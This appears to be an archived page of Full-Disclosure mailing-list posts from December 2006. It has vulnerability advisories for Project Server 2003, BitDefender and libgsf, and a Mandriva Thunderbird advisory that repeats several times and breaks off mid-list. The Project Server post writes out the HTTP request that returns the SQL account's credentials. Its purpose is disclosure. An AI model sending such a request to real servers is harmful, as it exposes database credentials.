Re: [Full-disclosure] [Fwd: MOST URGENT]

2006-12-15 Thread Peter van den Heuvel
recently died of Colonium-210 poisoning under mysterious
circumstances.

  Colonium my arse!

Well, Colonium-210, maybe something like Chanel-5. Is for the cheeks
too, though you're talking about the other cheeks...

Peter


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Project Server 2003 - Credential Disclosure

2006-12-15 Thread Brett Moore
==
% Project Server 2003 - Credential Disclosure
% [EMAIL PROTECTED]
==

Microsoft Project server 2003 implements a thick client
for some of the functionality. The thick client uses
XML requests to talk to the server of HTTP(S).

One of these requests returns the username and password
of the MSProjectUser account used to access the SQL
database as well as other system information.

--
POST http://SERVER/projectserver/logon/pdsrequest.asp HTTP/1.0
Accept: */*
Accept-Language: en-nz
Pragma: no-cache
Host: SERVER
Content-length: 87
Proxy-Connection: Keep-Alive
Cookie: PjSessionID=valid cookie

Request
GetInitializationData
Release1/Release
/GetInitializationData
/Request

Reply
HRESULT0/HRESULT
STATUS0/STATUS
UserNametheuser/UserName
GetInitializationData
GetLoginInformation
DBType0/DBType
DVR{SQLServer}/DVR
DBProjectServer/DB
SVRSERVER/SVR
ResGlobalID1/ResGlobalID
ResGlobalNameresglobal/ResGlobalName
UserNameMSProjectUser/UserName  
Passwordsekretpass/Password 
UserNTAccountSERVER\USER/UserNTAccount
/GetLoginInformation
/Reply
--

Some quick notes that mitigate this attack;
* The cookie must be a valid cookie, which is obtained via a 
  login with a valid username and password.
* Since the thick client is 'client side' any sql can be 
  manipulated anyway.
* The MSProjectUser should be a low level account anyway
* Other 'undocumented' or 'unauthorised' requests 'may' also 
  be able to be made through this method.

==
% 
==

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] BitDefender AV Packed PE File Parsing Engine Heap Overflow

2006-12-15 Thread security
n.runs AG  
http://www.nruns.com/ security at nruns.com
n.runs-SA-2006.003   15-Dec-2006


Vendor:BitDefender, http://www.bitdefender.com
Affected Products:
BitDefender Antivirus, 
BitDefender Antivirus Plus, 
BitDefender Internet Security, 
BitDefender Mail Protection for Enterprises, 
BitDefender Online Scanner, 
BitDefender for ISA Server, 
BitDefender for MS Exchange 2000, 
BitDefender for MS Exchange 2003, 
BitDefender for MS Exchange 5.5
Platforms:
Fedora, 
FreeBSD, 
Mandrake, 
Red Hat, 
SUSE, 
Slackware, 
Windows 2000, 
Windows 2003, 
Windows 98, 
Windows Me, 
Windows NT, 
Windows XP

Vulnerability: Arbitrary Code Execution (remote) 



Vendor communication:

  2006/08/24initial notification of BitDefender 
  2006/08/25BitDefender Response
  2006/08/26PGP keys exchange
  2006/08/28PoC files sent to BitDefender
  2006/08/29BitDefender confirmed the bug and fixed it.
  2006/08/30BitDefender released fixes through automatic update.


Overview:
 
BitDefenderT provides security solutions to satisfy the protection
requirements of today's computing environment, delivering effective threat
management to over 41 million home and corporate users in more than 200
countries.
BitDefender has garnered many awards, accolades and certifications since its
inception in 2001. From the prestigious European IST Prize, to the #1 Best
Buy ranking from PC World, and most recently, the PC World Best 100
Products of 2006, the Company is enjoying worldwide recognition for its
superior technology and product offering.



Description:
A remotely exploitable vulnerability has been found in the file parsing
engine.

In detail, the following flaw was determined:

- Heap Overflow through Integer Overflow in Packed PE File Parsing

This problem can lead to remote arbitrary code execution if an attacker
carefully crafts a file that exploits the aforementioned vulnerability.

Solution:
The vulnerabilities were reported on August 28 and an update has been issued
on August 29 to solve this vulnerability. The update has been delivered
immediately to all BitDefender users through the regular automatic update
mechanism, so no user action is required.

Note: We would like to thank BitDefender, who were available even during the
weekend to fix the problem, for their quick response. 



Credit: 
Bugs found by Sergio Alvarez of n.runs AG. 



References: 
http://www.bitdefender.com/KB323-en--cevakrnl.xmd-vulnerability.html



The information provided is released by n.runs as is without warranty of
any kind. n.runs disclaims all warranties, either express or implied, expect
for the warranties of merchantability. In no eventshall n.runs be liable for
any damages whatsever including direct, indirect, incidental, consequential,
loss of business profits or special damages, even if n.runs has been advised
of the possibility of such damages.
Distribution or Reproduction of the information is provided that the
advisory is not modified in any way.

Copyright 2006 n.runs. All rights reserved. Terms of use.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Hacking HomePlug Networks

2006-12-15 Thread David Kierznowski
HomePlug specification products also protect data by utilizing
powerful DES encryption, which makes hacking into a HomePlug network
virtually impossible.

I spent an amusing hour looking into this.

Details at:
http://michaeldaw.org/md-hacks/hacking_homeplugs/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] [ MDKSA-2006:220 ] - Updated libgsf packages fix heap buffer overflow vulnerability

2006-12-15 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory MDKSA-2006:220
 http://www.mandriva.com/security/
 ___
 
 Package : libgsf
 Date: November 30, 2006
 Affected: 2007.0, Corporate 3.0
 ___
 
 Problem Description:
 
 infamous41md discovered a heap buffer overflow vulnerability in
 libgsf, a GNOME library for reading and writing structured file
 formats, which could lead to the execution of arbitrary code.

 The updated packages have been patched to correct this problem.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4514
 http://www.debian.org/security/2006/dsa-1221
 ___
 
 Updated Packages:
 
 Mandriva Linux 2007.0:
 e2a8d38173f4d4eaf630779b212b9ecf  
2007.0/i586/libgsf-1_114-1.14.1-2.1mdv2007.0.i586.rpm
 0874198afe21dd57b297614d0451416c  
2007.0/i586/libgsf-1_114-devel-1.14.1-2.1mdv2007.0.i586.rpm
 5d46cfd87b088be65ac564b4208d3780  
2007.0/i586/libgsf-1.14.1-2.1mdv2007.0.i586.rpm 
 029b6965cd0d3c6ea198e9ac601fb972  
2007.0/SRPMS/libgsf-1.14.1-2.1mdv2007.0.src.rpm

 Mandriva Linux 2007.0/X86_64:
 003d7db8087dc2e8b1773011e6d4847a  
2007.0/x86_64/lib64gsf-1_114-1.14.1-2.1mdv2007.0.x86_64.rpm
 583a7f1fdd9b0c92b2ff6d64b18b08b4  
2007.0/x86_64/lib64gsf-1_114-devel-1.14.1-2.1mdv2007.0.x86_64.rpm
 1e676f26116db9f4a392d2719db228d5  
2007.0/x86_64/libgsf-1.14.1-2.1mdv2007.0.x86_64.rpm 
 029b6965cd0d3c6ea198e9ac601fb972  
2007.0/SRPMS/libgsf-1.14.1-2.1mdv2007.0.src.rpm

 Corporate 3.0:
 c059f972836144253da330f8db5387a3  
corporate/3.0/i586/libgsf-1_1-1.8.2-1.1.C30mdk.i586.rpm
 9f9fd3e74c9ec2ee6a79937d4740321c  
corporate/3.0/i586/libgsf-1_1-devel-1.8.2-1.1.C30mdk.i586.rpm 
 36f8c30001d414877e819c439143a696  
corporate/3.0/SRPMS/libgsf-1.8.2-1.1.C30mdk.src.rpm

 Corporate 3.0/X86_64:
 1a2bef3524a009d553419b159d80f781  
corporate/3.0/x86_64/lib64gsf-1_1-1.8.2-1.1.C30mdk.x86_64.rpm
 f2e48664350fd62e2b12dc77abe11a46  
corporate/3.0/x86_64/lib64gsf-1_1-devel-1.8.2-1.1.C30mdk.x86_64.rpm 
 36f8c30001d414877e819c439143a696  
corporate/3.0/SRPMS/libgsf-1.8.2-1.1.C30mdk.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  security*mandriva.com
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2.2 (GNU/Linux)

iD8DBQFFeVjlmqjQ0CJFipgRAk1UAJ0cyKR4wc+ugK6c/npq5JWbI51sCQCdF77e
x8dvBLpli85NDP7u30jsabg=
=o610
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] [ MDKSA-2006:206 ] - Updated Thunderbird packages fix multiple vulnerabilities

2006-12-15 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory MDKSA-2006:206
 http://www.mandriva.com/security/
 ___
 
 Package : mozilla-thunderbird
 Date: November 9, 2006
 Affected: 2007.0, Corporate 3.0
 ___
 
 Problem Description:
 
 A number of security vulnerabilities have been discovered and corrected
 in the latest Mozilla Thunderbird program, version 1.5.0.8.

 This update provides the latest Thunderbird to correct these issues.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5462
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5463
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5464
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5747
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5748
 http://www.mozilla.org/security/announce/2006/mfsa2006-65.html
 http://www.mozilla.org/security/announce/2006/mfsa2006-66.html
 http://www.mozilla.org/security/announce/2006/mfsa2006-67.html
 ___
 
 Updated Packages:
 
 Mandriva Linux 2007.0:
 488e65dfe45ecf7e3a9e1a3dedd5c2ce  
2007.0/i586/mozilla-thunderbird-1.5.0.8-1.1mdv2007.0.i586.rpm
 5e551ab45061148722dda1d7ce66959e  
2007.0/i586/mozilla-thunderbird-bg-1.5.0.8-1.1mdv2007.0.i586.rpm
 2149a7fd629b8bc6843c6fdf1bb49efb  
2007.0/i586/mozilla-thunderbird-ca-1.5.0.8-1.1mdv2007.0.i586.rpm
 0d2315b490e3b8dd2ab791bd6c3ee516  
2007.0/i586/mozilla-thunderbird-cs-1.5.0.8-1.1mdv2007.0.i586.rpm
 d5583d1b99b948c90e1cad62d753d67d  
2007.0/i586/mozilla-thunderbird-da-1.5.0.8-1.1mdv2007.0.i586.rpm
 00ec607c39d3de4c589997d6c7ee6679  
2007.0/i586/mozilla-thunderbird-de-1.5.0.8-1.1mdv2007.0.i586.rpm
 6d1f0f2576362a0bb90b4f9d8c4f2153  
2007.0/i586/mozilla-thunderbird-devel-1.5.0.8-1.1mdv2007.0.i586.rpm
 2cb0e44d2e3f7fddd60249843204403f  
2007.0/i586/mozilla-thunderbird-el-1.5.0.8-1.1mdv2007.0.i586.rpm
 0c3c771882698d5651775aeed24bfd73  
2007.0/i586/mozilla-thunderbird-enigmail-1.5.0.8-1.1mdv2007.0.i586.rpm
 477ca905391c1d555d0136d46d557869  
2007.0/i586/mozilla-thunderbird-enigmail-ca-1.5.0.8-1.1mdv2007.0.i586.rpm
 741811dd392d942b27e1b3b0de695d4e  
2007.0/i586/mozilla-thunderbird-enigmail-cs-1.5.0.8-1.1mdv2007.0.i586.rpm
 7c2c4922c6a2c6ce2cb6108a95f7dbfa  
2007.0/i586/mozilla-thunderbird-enigmail-de-1.5.0.8-1.1mdv2007.0.i586.rpm
 7cbf9f3218d587ef97edf01f2298096b  
2007.0/i586/mozilla-thunderbird-enigmail-el-1.5.0.8-1.1mdv2007.0.i586.rpm
 7dbd9e4c16db82a761a7b502c1f7f22d  
2007.0/i586/mozilla-thunderbird-enigmail-es-1.5.0.8-1.1mdv2007.0.i586.rpm
 b6dd6119216f6b748ee7c1570c3b8c37  
2007.0/i586/mozilla-thunderbird-enigmail-es_AR-1.5.0.8-1.1mdv2007.0.i586.rpm
 1eea732e08ca0ef96796c3f50abb1f77  
2007.0/i586/mozilla-thunderbird-enigmail-fi-1.5.0.8-1.1mdv2007.0.i586.rpm
 e1cc5cf2496581d776bb43e2f0dbbea6  
2007.0/i586/mozilla-thunderbird-enigmail-fr-1.5.0.8-1.1mdv2007.0.i586.rpm
 af86ce82ff9053250f82f2215c8dd7e5  
2007.0/i586/mozilla-thunderbird-enigmail-hu-1.5.0.8-1.1mdv2007.0.i586.rpm
 6319633c561c7f68c6614685126da02b  
2007.0/i586/mozilla-thunderbird-enigmail-it-1.5.0.8-1.1mdv2007.0.i586.rpm
 56387829c6cc83882246e68e3b8704b0  
2007.0/i586/mozilla-thunderbird-enigmail-ja-1.5.0.8-1.1mdv2007.0.i586.rpm
 56cb838bb0c375f53d3cff2eb76a1118  
2007.0/i586/mozilla-thunderbird-enigmail-nb-1.5.0.8-1.1mdv2007.0.i586.rpm
 253500598ff56ab85394e68708ace21d  
2007.0/i586/mozilla-thunderbird-enigmail-nl-1.5.0.8-1.1mdv2007.0.i586.rpm
 53b4d4f1aa4e8174a33a0ed436ce961a  
2007.0/i586/mozilla-thunderbird-enigmail-pl-1.5.0.8-1.1mdv2007.0.i586.rpm
 fb9dd6933d27029538cd01a64ec55cee  
2007.0/i586/mozilla-thunderbird-enigmail-pt-1.5.0.8-1.1mdv2007.0.i586.rpm
 701b9837303a3ed79e6c74c037c28926  
2007.0/i586/mozilla-thunderbird-enigmail-pt_BR-1.5.0.8-1.1mdv2007.0.i586.rpm
 b3739c1344770e92864c50f131f08884  
2007.0/i586/mozilla-thunderbird-enigmail-ru-1.5.0.8-1.1mdv2007.0.i586.rpm
 1efe7ebc2a71e2f2d6c2785026a6e7ac  
2007.0/i586/mozilla-thunderbird-enigmail-sk-1.5.0.8-1.1mdv2007.0.i586.rpm
 6860352b37999652aab785a266673e2f  
2007.0/i586/mozilla-thunderbird-enigmail-sl-1.5.0.8-1.1mdv2007.0.i586.rpm
 51abe323b14793097935b0c221e64f71  
2007.0/i586/mozilla-thunderbird-enigmail-sv-1.5.0.8-1.1mdv2007.0.i586.rpm
 b8ec884437a460c9fbb5c71db6a46c31  
2007.0/i586/mozilla-thunderbird-enigmail-zh_CN-1.5.0.8-1.1mdv2007.0.i586.rpm
 9ae4fb1871ee29f3f7b52210c0cf4e1b  
2007.0/i586/mozilla-thunderbird-es-1.5.0.8-1.1mdv2007.0.i586.rpm
 e1a31b03ffef8e86df09579296fce3c9  
2007.0/i586/mozilla-thunderbird-es_AR-1.5.0.8-1.1mdv2007.0.i586.rpm
 6b4bdbb4648231b128655e56015621c7  
2007.0/i586/mozilla-thunderbird-eu-1.5.0.8-1.1mdv2007.0.i586.rpm
 d333252ee1ba51351762e4050565ecb1  

[Full-disclosure] [ MDKSA-2006:206 ] - Updated Thunderbird packages fix multiple vulnerabilities

2006-12-15 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory MDKSA-2006:206
 http://www.mandriva.com/security/
 ___
 
 Package : mozilla-thunderbird
 Date: November 9, 2006
 Affected: 2007.0, Corporate 3.0
 ___
 
 Problem Description:
 
 A number of security vulnerabilities have been discovered and corrected
 in the latest Mozilla Thunderbird program, version 1.5.0.8.

 This update provides the latest Thunderbird to correct these issues.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5462
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5463
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5464
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5747
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5748
 http://www.mozilla.org/security/announce/2006/mfsa2006-65.html
 http://www.mozilla.org/security/announce/2006/mfsa2006-66.html
 http://www.mozilla.org/security/announce/2006/mfsa2006-67.html
 ___
 
 Updated Packages:
 
 Mandriva Linux 2007.0:
 488e65dfe45ecf7e3a9e1a3dedd5c2ce  
2007.0/i586/mozilla-thunderbird-1.5.0.8-1.1mdv2007.0.i586.rpm
 5e551ab45061148722dda1d7ce66959e  
2007.0/i586/mozilla-thunderbird-bg-1.5.0.8-1.1mdv2007.0.i586.rpm
 2149a7fd629b8bc6843c6fdf1bb49efb  
2007.0/i586/mozilla-thunderbird-ca-1.5.0.8-1.1mdv2007.0.i586.rpm
 0d2315b490e3b8dd2ab791bd6c3ee516  
2007.0/i586/mozilla-thunderbird-cs-1.5.0.8-1.1mdv2007.0.i586.rpm
 d5583d1b99b948c90e1cad62d753d67d  
2007.0/i586/mozilla-thunderbird-da-1.5.0.8-1.1mdv2007.0.i586.rpm
 00ec607c39d3de4c589997d6c7ee6679  
2007.0/i586/mozilla-thunderbird-de-1.5.0.8-1.1mdv2007.0.i586.rpm
 6d1f0f2576362a0bb90b4f9d8c4f2153  
2007.0/i586/mozilla-thunderbird-devel-1.5.0.8-1.1mdv2007.0.i586.rpm
 2cb0e44d2e3f7fddd60249843204403f  
2007.0/i586/mozilla-thunderbird-el-1.5.0.8-1.1mdv2007.0.i586.rpm
 0c3c771882698d5651775aeed24bfd73  
2007.0/i586/mozilla-thunderbird-enigmail-1.5.0.8-1.1mdv2007.0.i586.rpm
 477ca905391c1d555d0136d46d557869  
2007.0/i586/mozilla-thunderbird-enigmail-ca-1.5.0.8-1.1mdv2007.0.i586.rpm
 741811dd392d942b27e1b3b0de695d4e  
2007.0/i586/mozilla-thunderbird-enigmail-cs-1.5.0.8-1.1mdv2007.0.i586.rpm
 7c2c4922c6a2c6ce2cb6108a95f7dbfa  
2007.0/i586/mozilla-thunderbird-enigmail-de-1.5.0.8-1.1mdv2007.0.i586.rpm
 7cbf9f3218d587ef97edf01f2298096b  
2007.0/i586/mozilla-thunderbird-enigmail-el-1.5.0.8-1.1mdv2007.0.i586.rpm
 7dbd9e4c16db82a761a7b502c1f7f22d  
2007.0/i586/mozilla-thunderbird-enigmail-es-1.5.0.8-1.1mdv2007.0.i586.rpm
 b6dd6119216f6b748ee7c1570c3b8c37  
2007.0/i586/mozilla-thunderbird-enigmail-es_AR-1.5.0.8-1.1mdv2007.0.i586.rpm
 1eea732e08ca0ef96796c3f50abb1f77  
2007.0/i586/mozilla-thunderbird-enigmail-fi-1.5.0.8-1.1mdv2007.0.i586.rpm
 e1cc5cf2496581d776bb43e2f0dbbea6  
2007.0/i586/mozilla-thunderbird-enigmail-fr-1.5.0.8-1.1mdv2007.0.i586.rpm
 af86ce82ff9053250f82f2215c8dd7e5  
2007.0/i586/mozilla-thunderbird-enigmail-hu-1.5.0.8-1.1mdv2007.0.i586.rpm
 6319633c561c7f68c6614685126da02b  
2007.0/i586/mozilla-thunderbird-enigmail-it-1.5.0.8-1.1mdv2007.0.i586.rpm
 56387829c6cc83882246e68e3b8704b0  
2007.0/i586/mozilla-thunderbird-enigmail-ja-1.5.0.8-1.1mdv2007.0.i586.rpm
 56cb838bb0c375f53d3cff2eb76a1118  
2007.0/i586/mozilla-thunderbird-enigmail-nb-1.5.0.8-1.1mdv2007.0.i586.rpm
 253500598ff56ab85394e68708ace21d  
2007.0/i586/mozilla-thunderbird-enigmail-nl-1.5.0.8-1.1mdv2007.0.i586.rpm
 53b4d4f1aa4e8174a33a0ed436ce961a  
2007.0/i586/mozilla-thunderbird-enigmail-pl-1.5.0.8-1.1mdv2007.0.i586.rpm
 fb9dd6933d27029538cd01a64ec55cee  
2007.0/i586/mozilla-thunderbird-enigmail-pt-1.5.0.8-1.1mdv2007.0.i586.rpm
 701b9837303a3ed79e6c74c037c28926  
2007.0/i586/mozilla-thunderbird-enigmail-pt_BR-1.5.0.8-1.1mdv2007.0.i586.rpm
 b3739c1344770e92864c50f131f08884  
2007.0/i586/mozilla-thunderbird-enigmail-ru-1.5.0.8-1.1mdv2007.0.i586.rpm
 1efe7ebc2a71e2f2d6c2785026a6e7ac  
2007.0/i586/mozilla-thunderbird-enigmail-sk-1.5.0.8-1.1mdv2007.0.i586.rpm
 6860352b37999652aab785a266673e2f  
2007.0/i586/mozilla-thunderbird-enigmail-sl-1.5.0.8-1.1mdv2007.0.i586.rpm
 51abe323b14793097935b0c221e64f71  
2007.0/i586/mozilla-thunderbird-enigmail-sv-1.5.0.8-1.1mdv2007.0.i586.rpm
 b8ec884437a460c9fbb5c71db6a46c31  
2007.0/i586/mozilla-thunderbird-enigmail-zh_CN-1.5.0.8-1.1mdv2007.0.i586.rpm
 9ae4fb1871ee29f3f7b52210c0cf4e1b  
2007.0/i586/mozilla-thunderbird-es-1.5.0.8-1.1mdv2007.0.i586.rpm
 e1a31b03ffef8e86df09579296fce3c9  
2007.0/i586/mozilla-thunderbird-es_AR-1.5.0.8-1.1mdv2007.0.i586.rpm
 6b4bdbb4648231b128655e56015621c7  
2007.0/i586/mozilla-thunderbird-eu-1.5.0.8-1.1mdv2007.0.i586.rpm
 d333252ee1ba51351762e4050565ecb1  

[Full-disclosure] [ MDKSA-2006:206 ] - Updated Thunderbird packages fix multiple vulnerabilities

2006-12-15 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory MDKSA-2006:206
 http://www.mandriva.com/security/
 ___
 
 Package : mozilla-thunderbird
 Date: November 9, 2006
 Affected: 2007.0, Corporate 3.0
 ___
 
 Problem Description:
 
 A number of security vulnerabilities have been discovered and corrected
 in the latest Mozilla Thunderbird program, version 1.5.0.8.

 This update provides the latest Thunderbird to correct these issues.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5462
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5463
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5464
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5747
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5748
 http://www.mozilla.org/security/announce/2006/mfsa2006-65.html
 http://www.mozilla.org/security/announce/2006/mfsa2006-66.html
 http://www.mozilla.org/security/announce/2006/mfsa2006-67.html
 ___
 
 Updated Packages:
 
 Mandriva Linux 2007.0:
 488e65dfe45ecf7e3a9e1a3dedd5c2ce  
2007.0/i586/mozilla-thunderbird-1.5.0.8-1.1mdv2007.0.i586.rpm
 5e551ab45061148722dda1d7ce66959e  
2007.0/i586/mozilla-thunderbird-bg-1.5.0.8-1.1mdv2007.0.i586.rpm
 2149a7fd629b8bc6843c6fdf1bb49efb  
2007.0/i586/mozilla-thunderbird-ca-1.5.0.8-1.1mdv2007.0.i586.rpm
 0d2315b490e3b8dd2ab791bd6c3ee516  
2007.0/i586/mozilla-thunderbird-cs-1.5.0.8-1.1mdv2007.0.i586.rpm
 d5583d1b99b948c90e1cad62d753d67d  
2007.0/i586/mozilla-thunderbird-da-1.5.0.8-1.1mdv2007.0.i586.rpm
 00ec607c39d3de4c589997d6c7ee6679  
2007.0/i586/mozilla-thunderbird-de-1.5.0.8-1.1mdv2007.0.i586.rpm
 6d1f0f2576362a0bb90b4f9d8c4f2153  
2007.0/i586/mozilla-thunderbird-devel-1.5.0.8-1.1mdv2007.0.i586.rpm
 2cb0e44d2e3f7fddd60249843204403f  
2007.0/i586/mozilla-thunderbird-el-1.5.0.8-1.1mdv2007.0.i586.rpm
 0c3c771882698d5651775aeed24bfd73  
2007.0/i586/mozilla-thunderbird-enigmail-1.5.0.8-1.1mdv2007.0.i586.rpm
 477ca905391c1d555d0136d46d557869  
2007.0/i586/mozilla-thunderbird-enigmail-ca-1.5.0.8-1.1mdv2007.0.i586.rpm
 741811dd392d942b27e1b3b0de695d4e  
2007.0/i586/mozilla-thunderbird-enigmail-cs-1.5.0.8-1.1mdv2007.0.i586.rpm
 7c2c4922c6a2c6ce2cb6108a95f7dbfa  
2007.0/i586/mozilla-thunderbird-enigmail-de-1.5.0.8-1.1mdv2007.0.i586.rpm
 7cbf9f3218d587ef97edf01f2298096b  
2007.0/i586/mozilla-thunderbird-enigmail-el-1.5.0.8-1.1mdv2007.0.i586.rpm
 7dbd9e4c16db82a761a7b502c1f7f22d  
2007.0/i586/mozilla-thunderbird-enigmail-es-1.5.0.8-1.1mdv2007.0.i586.rpm
 b6dd6119216f6b748ee7c1570c3b8c37  
2007.0/i586/mozilla-thunderbird-enigmail-es_AR-1.5.0.8-1.1mdv2007.0.i586.rpm
 1eea732e08ca0ef96796c3f50abb1f77  
2007.0/i586/mozilla-thunderbird-enigmail-fi-1.5.0.8-1.1mdv2007.0.i586.rpm
 e1cc5cf2496581d776bb43e2f0dbbea6  
2007.0/i586/mozilla-thunderbird-enigmail-fr-1.5.0.8-1.1mdv2007.0.i586.rpm
 af86ce82ff9053250f82f2215c8dd7e5  
2007.0/i586/mozilla-thunderbird-enigmail-hu-1.5.0.8-1.1mdv2007.0.i586.rpm
 6319633c561c7f68c6614685126da02b  
2007.0/i586/mozilla-thunderbird-enigmail-it-1.5.0.8-1.1mdv2007.0.i586.rpm
 56387829c6cc83882246e68e3b8704b0  
2007.0/i586/mozilla-thunderbird-enigmail-ja-1.5.0.8-1.1mdv2007.0.i586.rpm
 56cb838bb0c375f53d3cff2eb76a1118  
2007.0/i586/mozilla-thunderbird-enigmail-nb-1.5.0.8-1.1mdv2007.0.i586.rpm
 253500598ff56ab85394e68708ace21d  
2007.0/i586/mozilla-thunderbird-enigmail-nl-1.5.0.8-1.1mdv2007.0.i586.rpm
 53b4d4f1aa4e8174a33a0ed436ce961a  
2007.0/i586/mozilla-thunderbird-enigmail-pl-1.5.0.8-1.1mdv2007.0.i586.rpm
 fb9dd6933d27029538cd01a64ec55cee  
2007.0/i586/mozilla-thunderbird-enigmail-pt-1.5.0.8-1.1mdv2007.0.i586.rpm
 701b9837303a3ed79e6c74c037c28926  
2007.0/i586/mozilla-thunderbird-enigmail-pt_BR-1.5.0.8-1.1mdv2007.0.i586.rpm
 b3739c1344770e92864c50f131f08884  
2007.0/i586/mozilla-thunderbird-enigmail-ru-1.5.0.8-1.1mdv2007.0.i586.rpm
 1efe7ebc2a71e2f2d6c2785026a6e7ac  
2007.0/i586/mozilla-thunderbird-enigmail-sk-1.5.0.8-1.1mdv2007.0.i586.rpm
 6860352b37999652aab785a266673e2f  
2007.0/i586/mozilla-thunderbird-enigmail-sl-1.5.0.8-1.1mdv2007.0.i586.rpm
 51abe323b14793097935b0c221e64f71  
2007.0/i586/mozilla-thunderbird-enigmail-sv-1.5.0.8-1.1mdv2007.0.i586.rpm
 b8ec884437a460c9fbb5c71db6a46c31  
2007.0/i586/mozilla-thunderbird-enigmail-zh_CN-1.5.0.8-1.1mdv2007.0.i586.rpm
 9ae4fb1871ee29f3f7b52210c0cf4e1b  
2007.0/i586/mozilla-thunderbird-es-1.5.0.8-1.1mdv2007.0.i586.rpm
 e1a31b03ffef8e86df09579296fce3c9  
2007.0/i586/mozilla-thunderbird-es_AR-1.5.0.8-1.1mdv2007.0.i586.rpm
 6b4bdbb4648231b128655e56015621c7  
2007.0/i586/mozilla-thunderbird-eu-1.5.0.8-1.1mdv2007.0.i586.rpm
 d333252ee1ba51351762e4050565ecb1  

[Full-disclosure] [ MDKSA-2006:206 ] - Updated Thunderbird packages fix multiple vulnerabilities

2006-12-15 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory MDKSA-2006:206
 http://www.mandriva.com/security/
 ___
 
 Package : mozilla-thunderbird
 Date: November 9, 2006
 Affected: 2007.0, Corporate 3.0
 ___
 
 Problem Description:
 
 A number of security vulnerabilities have been discovered and corrected
 in the latest Mozilla Thunderbird program, version 1.5.0.8.

 This update provides the latest Thunderbird to correct these issues.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5462
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5463
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5464
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5747
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5748
 http://www.mozilla.org/security/announce/2006/mfsa2006-65.html
 http://www.mozilla.org/security/announce/2006/mfsa2006-66.html
 http://www.mozilla.org/security/announce/2006/mfsa2006-67.html
 ___
 
 Updated Packages:
 
 Mandriva Linux 2007.0:
 488e65dfe45ecf7e3a9e1a3dedd5c2ce  
2007.0/i586/mozilla-thunderbird-1.5.0.8-1.1mdv2007.0.i586.rpm
 5e551ab45061148722dda1d7ce66959e  
2007.0/i586/mozilla-thunderbird-bg-1.5.0.8-1.1mdv2007.0.i586.rpm
 2149a7fd629b8bc6843c6fdf1bb49efb  
2007.0/i586/mozilla-thunderbird-ca-1.5.0.8-1.1mdv2007.0.i586.rpm
 0d2315b490e3b8dd2ab791bd6c3ee516  
2007.0/i586/mozilla-thunderbird-cs-1.5.0.8-1.1mdv2007.0.i586.rpm
 d5583d1b99b948c90e1cad62d753d67d  
2007.0/i586/mozilla-thunderbird-da-1.5.0.8-1.1mdv2007.0.i586.rpm
 00ec607c39d3de4c589997d6c7ee6679  
2007.0/i586/mozilla-thunderbird-de-1.5.0.8-1.1mdv2007.0.i586.rpm
 6d1f0f2576362a0bb90b4f9d8c4f2153  
2007.0/i586/mozilla-thunderbird-devel-1.5.0.8-1.1mdv2007.0.i586.rpm
 2cb0e44d2e3f7fddd60249843204403f  
2007.0/i586/mozilla-thunderbird-el-1.5.0.8-1.1mdv2007.0.i586.rpm
 0c3c771882698d5651775aeed24bfd73  
2007.0/i586/mozilla-thunderbird-enigmail-1.5.0.8-1.1mdv2007.0.i586.rpm
 477ca905391c1d555d0136d46d557869  
